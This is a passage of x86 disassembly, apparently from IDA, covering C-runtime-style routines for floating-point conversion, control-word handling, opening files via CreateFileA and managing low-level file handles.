var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
movzx ecx, word ptr [eax+0Ah]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, ecx
and ecx, 8000h
mov [ebp+arg_0], ecx
mov ecx, [eax+6]
mov [ebp+var_C], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
shl eax, 10h
and edi, 7FFFh
sub edi, 3FFFh
cmp edi, 0FFFFC001h
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
mov [ebp+var_8], ecx
push eax
jnz short loc_41568F
xor ebx, ebx
call sub_415592
test eax, eax
pop ecx
jnz loc_41573E
lea edi, [ebp+var_C]
stosd
stosd
stosd
loc_415687: ; CODE XREF: sub_415626+DA�j
push 2
pop eax
jmp loc_415740
; ---------------------------------------------------------------------------
loc_41568F: ; CODE XREF: sub_415626+49�j
lea eax, [ebp+var_18]
push eax
call sub_415577
push dword ptr [esi+8]
lea eax, [ebp+var_C]
push eax
call sub_415505
add esp, 10h
test eax, eax
jz short loc_4156AC
inc edi
loc_4156AC: ; CODE XREF: sub_415626+83�j
mov eax, [esi+4]
mov ecx, eax
sub ecx, [esi+8]
cmp edi, ecx
jge short loc_4156C2
xor eax, eax
lea edi, [ebp+var_C]
stosd
stosd
stosd
jmp short loc_4156FE
; ---------------------------------------------------------------------------
loc_4156C2: ; CODE XREF: sub_415626+90�j
cmp edi, eax
jg short loc_415702
sub eax, edi
mov edi, eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_415577
lea eax, [ebp+var_C]
push edi
push eax
call sub_4155AB
push dword ptr [esi+8]
lea eax, [ebp+var_C]
push eax
call sub_415505
mov eax, [esi+0Ch]
inc eax
push eax
lea eax, [ebp+var_C]
push eax
call sub_4155AB
add esp, 20h
loc_4156FE: ; CODE XREF: sub_415626+9A�j
xor ebx, ebx
jmp short loc_415687
; ---------------------------------------------------------------------------
loc_415702: ; CODE XREF: sub_415626+9E�j
cmp edi, [esi]
push dword ptr [esi+0Ch]
jl short loc_41572A
xor eax, eax
lea edi, [ebp+var_C]
stosd
stosd
stosd
or byte ptr [ebp+var_C+3], 80h
lea eax, [ebp+var_C]
push eax
call sub_4155AB
mov ebx, [esi+14h]
add ebx, [esi]
pop ecx
xor eax, eax
pop ecx
inc eax
jmp short loc_415740
; ---------------------------------------------------------------------------
loc_41572A: ; CODE XREF: sub_415626+E1�j
mov ebx, [esi+14h]
and byte ptr [ebp+var_C+3], 7Fh
lea eax, [ebp+var_C]
push eax
add ebx, edi
call sub_4155AB
pop ecx
pop ecx
loc_41573E: ; CODE XREF: sub_415626+55�j
xor eax, eax
loc_415740: ; CODE XREF: sub_415626+64�j
; sub_415626+102�j
push 1Fh
pop ecx
sub ecx, [esi+0Ch]
mov esi, [esi+10h]
shl ebx, cl
mov ecx, [ebp+arg_0]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or ebx, ecx
or ebx, [ebp+var_C]
cmp esi, 40h
jnz short loc_41576F
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx+4], ebx
mov [ecx], edx
jmp short loc_415779
; ---------------------------------------------------------------------------
loc_41576F: ; CODE XREF: sub_415626+13A�j
cmp esi, 20h
jnz short loc_415779
mov ecx, [ebp+arg_4]
mov [ecx], ebx
loc_415779: ; CODE XREF: sub_415626+147�j
; sub_415626+14C�j
pop edi
pop esi
pop ebx
leave
retn
sub_415626 endp
; =============== S U B R O U T I N E =======================================
sub_41577E proc near ; CODE XREF: sub_4157AA+2E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_421638
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_415626
add esp, 0Ch
retn
sub_41577E endp
; =============== S U B R O U T I N E =======================================
sub_415794 proc near ; CODE XREF: sub_4157ED+2E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_421650
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_415626
add esp, 0Ch
retn
sub_415794 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4157AA proc near ; CODE XREF: sub_411C70+12�p
var_14 = byte ptr -14h
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_421360
xor eax, [ebp+4]
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_14]
push eax
call sub_416F96
push [ebp+arg_0]
lea eax, [ebp+var_14]
push eax
call sub_41577E
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 24h
call sub_411BA5
leave
retn
sub_4157AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4157ED proc near ; CODE XREF: sub_411C70+2D�p
var_14 = byte ptr -14h
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_421360
xor eax, [ebp+4]
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_14]
push eax
call sub_416F96
push [ebp+arg_0]
lea eax, [ebp+var_14]
push eax
call sub_415794
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 24h
call sub_411BA5
leave
retn
sub_4157ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415830 proc near ; CODE XREF: sub_411CCB+64�p
; sub_411DBE+5D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_8]
mov ecx, [edx+0Ch]
push ebx
mov ebx, [ebp+arg_4]
test ebx, ebx
push esi
mov esi, [ebp+arg_0]
push edi
lea edi, [esi+1]
mov byte ptr [esi], 30h
mov eax, edi
jle short loc_41586D
mov [ebp+arg_0], ebx
xor ebx, ebx
loc_415853: ; CODE XREF: sub_415830+38�j
mov dl, [ecx]
test dl, dl
jz short loc_41585F
movsx edx, dl
inc ecx
jmp short loc_415862
; ---------------------------------------------------------------------------
loc_41585F: ; CODE XREF: sub_415830+27�j
push 30h
pop edx
loc_415862: ; CODE XREF: sub_415830+2D�j
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_415853
mov edx, [ebp+arg_8]
loc_41586D: ; CODE XREF: sub_415830+1C�j
and byte ptr [eax], 0
test ebx, ebx
jl short loc_415886
cmp byte ptr [ecx], 35h
jl short loc_415886
jmp short loc_41587E
; ---------------------------------------------------------------------------
loc_41587B: ; CODE XREF: sub_415830+52�j
mov byte ptr [eax], 30h
loc_41587E: ; CODE XREF: sub_415830+49�j
dec eax
cmp byte ptr [eax], 39h
jz short loc_41587B
inc byte ptr [eax]
loc_415886: ; CODE XREF: sub_415830+42�j
; sub_415830+47�j
cmp byte ptr [esi], 31h
jnz short loc_415890
inc dword ptr [edx+4]
jmp short loc_4158A2
; ---------------------------------------------------------------------------
loc_415890: ; CODE XREF: sub_415830+59�j
push edi
call sub_40D630
inc eax
push eax
push edi
push esi
call sub_40F260
add esp, 10h
loc_4158A2: ; CODE XREF: sub_415830+5E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_415830 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4158A7 proc near ; CODE XREF: sub_415961+1B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov ax, [edx+6]
push ebx
push esi
push edi
mov edi, 7FFh
mov esi, 80000000h
mov [ebp+var_4], esi
mov ecx, eax
shr ecx, 4
and eax, 8000h
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
and eax, 0FFFFFh
test ebx, ebx
jz short loc_4158F7
cmp ebx, edi
jz short loc_4158F0
lea edi, [ecx+3C00h]
jmp short loc_415918
; ---------------------------------------------------------------------------
loc_4158F0: ; CODE XREF: sub_4158A7+3F�j
mov edi, 7FFFh
jmp short loc_415918
; ---------------------------------------------------------------------------
loc_4158F7: ; CODE XREF: sub_4158A7+3B�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_41590F
cmp edx, ebx
jnz short loc_41590F
mov eax, [ebp+arg_0]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], bx
jmp short loc_41595C
; ---------------------------------------------------------------------------
loc_41590F: ; CODE XREF: sub_4158A7+54�j
; sub_4158A7+58�j
lea edi, [ecx+3C01h]
mov [ebp+var_4], ebx
loc_415918: ; CODE XREF: sub_4158A7+47�j
; sub_4158A7+4E�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
or ecx, [ebp+var_4]
mov eax, [ebp+arg_0]
shl edx, 0Bh
test ecx, esi
mov [eax+4], ecx
mov [eax], edx
jnz short loc_415953
loc_415934: ; CODE XREF: sub_4158A7+AA�j
mov ecx, [eax]
mov edx, [eax+4]
mov ebx, ecx
shl edx, 1
shr ebx, 1Fh
or edx, ebx
add ecx, ecx
add edi, 0FFFFh
test edx, esi
mov [eax+4], edx
mov [eax], ecx
jz short loc_415934
loc_415953: ; CODE XREF: sub_4158A7+8B�j
mov ecx, [ebp+arg_4]
or ecx, edi
mov [eax+8], cx
loc_41595C: ; CODE XREF: sub_4158A7+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_4158A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415961 proc near ; CODE XREF: sub_411CCB+3E�p
; sub_411DBE+42�p ...
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_421360
xor eax, [ebp+4]
push esi
mov [ebp+var_4], eax
push edi
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_4158A7
pop ecx
pop ecx
push offset word_4C5AE4
push 0
push 11h
sub esp, 0Ch
lea esi, [ebp+var_10]
mov edi, esp
movsd
movsd
movsw
call sub_417423
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
mov dword_4C5B08, eax
movsx eax, byte_4C5AE6
mov dword_4C5B00, eax
movsx eax, word_4C5AE4
mov dword_4C5B04, eax
add esp, 18h
mov dword_4C5B0C, offset dword_4C5AE8
mov eax, offset dword_4C5B00
call sub_411BA5
pop edi
pop esi
leave
retn
sub_415961 endp
; ---------------------------------------------------------------------------
push 2
call sub_40F82D
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_4159E4 proc near ; CODE XREF: sub_415B04+C�p
xor eax, eax
test bl, 1
jz short loc_4159EE
push 10h
pop eax
loc_4159EE: ; CODE XREF: sub_4159E4+5�j
test bl, 4
jz short loc_4159F6
or eax, 8
loc_4159F6: ; CODE XREF: sub_4159E4+D�j
test bl, 8
jz short loc_4159FE
or eax, 4
loc_4159FE: ; CODE XREF: sub_4159E4+15�j
test bl, 10h
jz short loc_415A06
or eax, 2
loc_415A06: ; CODE XREF: sub_4159E4+1D�j
test bl, 20h
jz short loc_415A0E
or eax, 1
loc_415A0E: ; CODE XREF: sub_4159E4+25�j
test bl, 2
jz short loc_415A18
or eax, 80000h
loc_415A18: ; CODE XREF: sub_4159E4+2D�j
push ebp
movzx edx, bx
push esi
mov ecx, edx
mov esi, 0C00h
and ecx, esi
push edi
mov edi, 300h
mov ebp, 200h
jz short loc_415A54
cmp ecx, 400h
jz short loc_415A4F
cmp ecx, 800h
jz short loc_415A4B
cmp ecx, esi
jnz short loc_415A54
or eax, edi
jmp short loc_415A54
; ---------------------------------------------------------------------------
loc_415A4B: ; CODE XREF: sub_4159E4+5D�j
or eax, ebp
jmp short loc_415A54
; ---------------------------------------------------------------------------
loc_415A4F: ; CODE XREF: sub_4159E4+55�j
or eax, 100h
loc_415A54: ; CODE XREF: sub_4159E4+4D�j
; sub_4159E4+61�j ...
and edx, edi
jz short loc_415A63
cmp edx, ebp
jnz short loc_415A68
or eax, 10000h
jmp short loc_415A68
; ---------------------------------------------------------------------------
loc_415A63: ; CODE XREF: sub_4159E4+72�j
or eax, 20000h
loc_415A68: ; CODE XREF: sub_4159E4+76�j
; sub_4159E4+7D�j
test bh, 10h
pop edi
pop esi
pop ebp
jz short locret_415A75
or eax, 40000h
locret_415A75: ; CODE XREF: sub_4159E4+8A�j
retn
sub_4159E4 endp
; =============== S U B R O U T I N E =======================================
sub_415A76 proc near ; CODE XREF: sub_415B04+22�p
xor eax, eax
test bl, 10h
jz short loc_415A7E
inc eax
loc_415A7E: ; CODE XREF: sub_415A76+5�j
test bl, 8
jz short loc_415A86
or eax, 4
loc_415A86: ; CODE XREF: sub_415A76+B�j
test bl, 4
jz short loc_415A8E
or eax, 8
loc_415A8E: ; CODE XREF: sub_415A76+13�j
test bl, 2
jz short loc_415A96
or eax, 10h
loc_415A96: ; CODE XREF: sub_415A76+1B�j
test bl, 1
jz short loc_415A9E
or eax, 20h
loc_415A9E: ; CODE XREF: sub_415A76+23�j
test ebx, 80000h
jz short loc_415AA9
or eax, 2
loc_415AA9: ; CODE XREF: sub_415A76+2E�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
push esi
mov esi, 200h
jz short loc_415ADD
cmp ecx, 100h
jz short loc_415AD8
cmp ecx, esi
jz short loc_415AD1
cmp ecx, edx
jnz short loc_415ADD
or eax, 0C00h
jmp short loc_415ADD
; ---------------------------------------------------------------------------
loc_415AD1: ; CODE XREF: sub_415A76+4E�j
or eax, 800h
jmp short loc_415ADD
; ---------------------------------------------------------------------------
loc_415AD8: ; CODE XREF: sub_415A76+4A�j
or eax, 400h
loc_415ADD: ; CODE XREF: sub_415A76+42�j
; sub_415A76+52�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_415AF3
cmp ecx, 10000h
jnz short loc_415AF5
or eax, esi
jmp short loc_415AF5
; ---------------------------------------------------------------------------
loc_415AF3: ; CODE XREF: sub_415A76+6F�j
or eax, edx
loc_415AF5: ; CODE XREF: sub_415A76+77�j
; sub_415A76+7B�j
test ebx, 40000h
pop esi
jz short locret_415B03
or eax, 1000h
locret_415B03: ; CODE XREF: sub_415A76+86�j
retn
sub_415A76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B04 proc near ; CODE XREF: sub_415B36+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
fstcw word ptr [ebp+var_4]
mov ebx, [ebp+var_4]
call sub_4159E4
mov ebx, eax
mov eax, [ebp+arg_4]
not eax
and ebx, eax
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
or ebx, eax
call sub_415A76
mov [ebp+arg_4], eax
fldcw word ptr [ebp+arg_4]
mov eax, ebx
pop ebx
leave
retn
sub_415B04 endp
; =============== S U B R O U T I N E =======================================
sub_415B36 proc near ; CODE XREF: sub_411F96+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
and eax, 0FFF7FFFFh
push eax
push [esp+4+arg_0]
call sub_415B04
pop ecx
pop ecx
retn
sub_415B36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B4C proc near ; CODE XREF: sub_412C19+137�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov ecx, [ebp+arg_4]
push ebx
xor ebx, ebx
test cl, cl
push esi
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], ebx
jns short loc_415B70
mov [ebp+var_14], ebx
mov [ebp+var_1], 10h
jmp short loc_415B7B
; ---------------------------------------------------------------------------
loc_415B70: ; CODE XREF: sub_415B4C+19�j
and [ebp+var_1], 0
mov [ebp+var_14], 1
loc_415B7B: ; CODE XREF: sub_415B4C+22�j
mov eax, 8000h
test ecx, eax
jnz short loc_415B95
test ch, 40h
jnz short loc_415B91
cmp dword_4C5B28, eax
jz short loc_415B95
loc_415B91: ; CODE XREF: sub_415B4C+3B�j
or [ebp+var_1], 80h
loc_415B95: ; CODE XREF: sub_415B4C+36�j
; sub_415B4C+43�j
push 3
mov eax, ecx
pop esi
and eax, esi
sub eax, ebx
jz short loc_415BB8
dec eax
jz short loc_415BAF
dec eax
jnz short loc_415BD6
mov [ebp+var_10], 0C0000000h
jmp short loc_415BBF
; ---------------------------------------------------------------------------
loc_415BAF: ; CODE XREF: sub_415B4C+55�j
mov [ebp+var_10], 40000000h
jmp short loc_415BBF
; ---------------------------------------------------------------------------
loc_415BB8: ; CODE XREF: sub_415B4C+52�j
mov [ebp+var_10], 80000000h
loc_415BBF: ; CODE XREF: sub_415B4C+61�j
; sub_415B4C+6A�j
mov eax, [ebp+arg_8]
cmp eax, 10h
jz short loc_415C05
cmp eax, 20h
jz short loc_415BFC
cmp eax, 30h
jz short loc_415BF3
cmp eax, 40h
jz short loc_415BEE
loc_415BD6: ; CODE XREF: sub_415B4C+58�j
mov dword_4C5904, 16h
mov dword_4C5908, ebx
or eax, 0FFFFFFFFh
jmp loc_415DCD
; ---------------------------------------------------------------------------
loc_415BEE: ; CODE XREF: sub_415B4C+88�j
mov [ebp+var_8], esi
jmp short loc_415C08
; ---------------------------------------------------------------------------
loc_415BF3: ; CODE XREF: sub_415B4C+83�j
mov [ebp+var_8], 2
jmp short loc_415C08
; ---------------------------------------------------------------------------
loc_415BFC: ; CODE XREF: sub_415B4C+7E�j
mov [ebp+var_8], 1
jmp short loc_415C08
; ---------------------------------------------------------------------------
loc_415C05: ; CODE XREF: sub_415B4C+79�j
mov [ebp+var_8], ebx
loc_415C08: ; CODE XREF: sub_415B4C+A5�j
; sub_415B4C+AE�j ...
mov eax, ecx
mov edx, 700h
and eax, edx
mov ecx, 400h
cmp eax, ecx
push edi
mov edi, 100h
jg short loc_415C4F
jz short loc_415C4A
cmp eax, ebx
jz short loc_415C4A
cmp eax, edi
jz short loc_415C41
cmp eax, 200h
jz short loc_415C79
cmp eax, 300h
jnz short loc_415C61
mov [ebp+var_C], 2
jmp short loc_415C89
; ---------------------------------------------------------------------------
loc_415C41: ; CODE XREF: sub_415B4C+DC�j
mov [ebp+var_C], 4
jmp short loc_415C89
; ---------------------------------------------------------------------------
loc_415C4A: ; CODE XREF: sub_415B4C+D4�j
; sub_415B4C+D8�j
mov [ebp+var_C], esi
jmp short loc_415C89
; ---------------------------------------------------------------------------
loc_415C4F: ; CODE XREF: sub_415B4C+D2�j
cmp eax, 500h
jz short loc_415C82
cmp eax, 600h
jz short loc_415C79
cmp eax, edx
jz short loc_415C82
loc_415C61: ; CODE XREF: sub_415B4C+EA�j
mov dword_4C5904, 16h
mov dword_4C5908, ebx
loc_415C71: ; CODE XREF: sub_415B4C+2CB�j
or eax, 0FFFFFFFFh
jmp loc_415DCC
; ---------------------------------------------------------------------------
loc_415C79: ; CODE XREF: sub_415B4C+E3�j
; sub_415B4C+10F�j
mov [ebp+var_C], 5
jmp short loc_415C89
; ---------------------------------------------------------------------------
loc_415C82: ; CODE XREF: sub_415B4C+108�j
; sub_415B4C+113�j
mov [ebp+var_C], 1
loc_415C89: ; CODE XREF: sub_415B4C+F3�j
; sub_415B4C+FC�j ...
mov eax, [ebp+arg_4]
test eax, edi
mov esi, 80h
jz short loc_415CA7
mov ecx, dword_4C590C
not ecx
and ecx, [ebp+arg_C]
test cl, cl
js short loc_415CA7
xor esi, esi
inc esi
loc_415CA7: ; CODE XREF: sub_415B4C+147�j
; sub_415B4C+156�j
test al, 40h
jz short loc_415CC2
or byte ptr [ebp+var_10+2], 1
or esi, 4000000h
cmp dword_4C5910, 2
jnz short loc_415CC2
or [ebp+var_8], 4
loc_415CC2: ; CODE XREF: sub_415B4C+15D�j
; sub_415B4C+170�j
test ah, 10h
jz short loc_415CC9
or esi, edi
loc_415CC9: ; CODE XREF: sub_415B4C+179�j
test al, 20h
jz short loc_415CD5
or esi, 8000000h
jmp short loc_415CDF
; ---------------------------------------------------------------------------
loc_415CD5: ; CODE XREF: sub_415B4C+17F�j
test al, 10h
jz short loc_415CDF
or esi, 10000000h
loc_415CDF: ; CODE XREF: sub_415B4C+187�j
; sub_415B4C+18B�j
call sub_415E1C
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jnz short loc_415D05
and dword_4C5908, 0
mov dword_4C5904, 18h
loc_415CFE: ; CODE XREF: sub_415B4C+1F7�j
mov eax, edi
jmp loc_415DCC
; ---------------------------------------------------------------------------
loc_415D05: ; CODE XREF: sub_415B4C+19F�j
push 0
push esi
push [ebp+var_C]
lea eax, [ebp+var_1C]
push eax
push [ebp+var_8]
push [ebp+var_10]
push [ebp+arg_0]
call dword_4190E0 ; CreateFileA
mov esi, eax
cmp esi, edi
jz short loc_415D36
push esi
call dword_4191B0 ; GetFileType
test eax, eax
jnz short loc_415D45
push esi
call dword_419064 ; CloseHandle
loc_415D36: ; CODE XREF: sub_415B4C+1D6�j
call dword_4190AC ; RtlGetLastWin32Error
push eax
call sub_412BBA
pop ecx
jmp short loc_415CFE
; ---------------------------------------------------------------------------
loc_415D45: ; CODE XREF: sub_415B4C+1E1�j
cmp eax, 2
jnz short loc_415D50
or [ebp+var_1], 40h
jmp short loc_415D59
; ---------------------------------------------------------------------------
loc_415D50: ; CODE XREF: sub_415B4C+1FC�j
cmp eax, 3
jnz short loc_415D59
or [ebp+var_1], 8
loc_415D59: ; CODE XREF: sub_415B4C+202�j
; sub_415B4C+207�j
push esi
push ebx
call sub_415EB9
mov al, [ebp+var_1]
pop ecx
pop ecx
mov ecx, ebx
sar ecx, 5
or al, 1
mov esi, ebx
and esi, 1Fh
lea edi, ds:4C5DC0h[ecx*4]
mov ecx, [edi]
shl esi, 3
mov [ebp+var_1], al
and [ebp+var_1], 48h
mov [ecx+esi+4], al
jnz short loc_415DB5
test al, al
jns short loc_415DB5
test byte ptr [ebp+arg_4], 2
jz short loc_415DB5
push 2
push 0FFFFFFFFh
push ebx
call sub_4134BF
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_415DD1
cmp dword_4C5908, 83h
jnz short loc_415E10
loc_415DB5: ; CODE XREF: sub_415B4C+23C�j
; sub_415B4C+240�j ...
cmp [ebp+var_1], 0
jnz short loc_415DCA
test byte ptr [ebp+arg_4], 8
jz short loc_415DCA
mov eax, [edi]
lea eax, [eax+esi+4]
or byte ptr [eax], 20h
loc_415DCA: ; CODE XREF: sub_415B4C+26D�j
; sub_415B4C+273�j
mov eax, ebx
loc_415DCC: ; CODE XREF: sub_415B4C+128�j
; sub_415B4C+1B4�j
pop edi
loc_415DCD: ; CODE XREF: sub_415B4C+9D�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_415DD1: ; CODE XREF: sub_415B4C+25B�j
and [ebp+var_2], 0
push 1
lea eax, [ebp+var_2]
push eax
push ebx
call sub_41050F
add esp, 0Ch
test eax, eax
jnz short loc_415DFE
cmp [ebp+var_2], 1Ah
jnz short loc_415DFE
push [ebp+var_10]
push ebx
call sub_4176B7
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz short loc_415E10
loc_415DFE: ; CODE XREF: sub_415B4C+29A�j
; sub_415B4C+2A0�j
push 0
push 0
push ebx
call sub_4134BF
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_415DB5
loc_415E10: ; CODE XREF: sub_415B4C+267�j
; sub_415B4C+2B0�j
push ebx
call sub_412DF3
pop ecx
jmp loc_415C71
sub_415B4C endp
; =============== S U B R O U T I N E =======================================
sub_415E1C proc near ; CODE XREF: sub_415B4C:loc_415CDF�p
push ebx
push ebp
push esi
push edi
or ebx, 0FFFFFFFFh
xor esi, esi
xor edx, edx
mov ecx, offset dword_4C5DC0
mov edi, 100h
loc_415E31: ; CODE XREF: sub_415E1C+54�j
mov eax, [ecx]
test eax, eax
jz short loc_415E74
lea ebp, [eax+100h]
jmp short loc_415E4C
; ---------------------------------------------------------------------------
loc_415E3F: ; CODE XREF: sub_415E1C+32�j
test byte ptr [eax+4], 1
jz short loc_415E52
mov ebp, [ecx]
add eax, 8
add ebp, edi
loc_415E4C: ; CODE XREF: sub_415E1C+21�j
cmp eax, ebp
jb short loc_415E3F
jmp short loc_415E63
; ---------------------------------------------------------------------------
loc_415E52: ; CODE XREF: sub_415E1C+27�j
or dword ptr [eax], 0FFFFFFFFh
sub eax, [ecx]
sar eax, 3
add eax, edx
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_415EB2
loc_415E63: ; CODE XREF: sub_415E1C+34�j
add ecx, 4
inc esi
add edx, 20h
cmp ecx, offset dword_4C5EC0
jl short loc_415E31
jmp short loc_415EB2
; ---------------------------------------------------------------------------
loc_415E74: ; CODE XREF: sub_415E1C+19�j
push edi
call sub_40E74F
test eax, eax
pop ecx
jz short loc_415EB2
add dword_4C5DA0, 20h
lea ecx, ds:4C5DC0h[esi*4]
mov [ecx], eax
lea edx, [eax+100h]
jmp short loc_415EA9
; ---------------------------------------------------------------------------
loc_415E97: ; CODE XREF: sub_415E1C+8F�j
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov edx, [ecx]
add eax, 8
add edx, edi
loc_415EA9: ; CODE XREF: sub_415E1C+79�j
cmp eax, edx
jb short loc_415E97
shl esi, 5
mov ebx, esi
loc_415EB2: ; CODE XREF: sub_415E1C+45�j
; sub_415E1C+56�j ...
pop edi
pop esi
pop ebp
mov eax, ebx
pop ebx
retn
sub_415E1C endp
; =============== S U B R O U T I N E =======================================
sub_415EB9 proc near ; CODE XREF: sub_415B4C+20F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, dword_4C5DA0
push esi
push edi
jnb short loc_415F19
mov ecx, eax
sar ecx, 5
mov esi, eax
and esi, 1Fh
lea edi, ds:4C5DC0h[ecx*4]
mov ecx, [edi]
shl esi, 3
cmp dword ptr [esi+ecx], 0FFFFFFFFh
jnz short loc_415F19
cmp dword_421254, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_415F0F
sub eax, 0
jz short loc_415F06
dec eax
jz short loc_415F01
dec eax
jnz short loc_415F0F
push ebx
push 0FFFFFFF4h
jmp short loc_415F09
; ---------------------------------------------------------------------------
loc_415F01: ; CODE XREF: sub_415EB9+3E�j
push ebx
push 0FFFFFFF5h
jmp short loc_415F09
; ---------------------------------------------------------------------------
loc_415F06: ; CODE XREF: sub_415EB9+3B�j
push ebx
push 0FFFFFFF6h
loc_415F09: ; CODE XREF: sub_415EB9+46�j
; sub_415EB9+4B�j
call dword_419184 ; SetStdHandle
loc_415F0F: ; CODE XREF: sub_415EB9+36�j
; sub_415EB9+41�j
mov eax, [edi]
mov [esi+eax], ebx
xor eax, eax
pop ebx
jmp short loc_415F2D
; ---------------------------------------------------------------------------
loc_415F19: ; CODE XREF: sub_415EB9+C�j
; sub_415EB9+28�j
and dword_4C5908, 0
mov dword_4C5904, 9
or eax, 0FFFFFFFFh
loc_415F2D: ; CODE XREF: sub_415EB9+5E�j
pop edi
pop esi
retn
sub_415EB9 endp
; =============== S U B R O U T I N E =======================================
sub_415F30 proc near ; CODE XREF: sub_412DF3+7C�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp ecx, dword_4C5DA0
push esi
push edi
jnb short loc_415F93
mov eax, ecx
sar eax, 5
mov esi, ecx
lea edi, ds:4C5DC0h[eax*4]
mov eax, [edi]
and esi, 1Fh
shl esi, 3
add eax, esi
test byte ptr [eax+4], 1
jz short loc_415F93
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_415F93
cmp dword_421254, 1
jnz short loc_415F89
xor eax, eax
sub ecx, eax
jz short loc_415F80
dec ecx
jz short loc_415F7B
dec ecx
jnz short loc_415F89
push eax
push 0FFFFFFF4h
jmp short loc_415F83
; ---------------------------------------------------------------------------
loc_415F7B: ; CODE XREF: sub_415F30+41�j
push eax
push 0FFFFFFF5h
jmp short loc_415F83
; ---------------------------------------------------------------------------
loc_415F80: ; CODE XREF: sub_415F30+3E�j
push eax
push 0FFFFFFF6h
loc_415F83: ; CODE XREF: sub_415F30+49�j
; sub_415F30+4E�j
call dword_419184 ; SetStdHandle
loc_415F89: ; CODE XREF: sub_415F30+38�j
; sub_415F30+44�j
mov eax, [edi]
or dword ptr [esi+eax], 0FFFFFFFFh
xor eax, eax
jmp short loc_415FA7
; ---------------------------------------------------------------------------
loc_415F93: ; CODE XREF: sub_415F30+C�j
; sub_415F30+2A�j ...
and dword_4C5908, 0
mov dword_4C5904, 9
or eax, 0FFFFFFFFh
loc_415FA7: ; CODE XREF: sub_415F30+61�j
pop edi
pop esi
retn
sub_415F30 endp
; =============== S U B R O U T I N E =======================================
sub_415FAA proc near ; CODE XREF: sub_412DF3+32�p
; sub_412DF3+49�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_4C5DA0
jnb short loc_415FD1
mov ecx, eax
sar ecx, 5
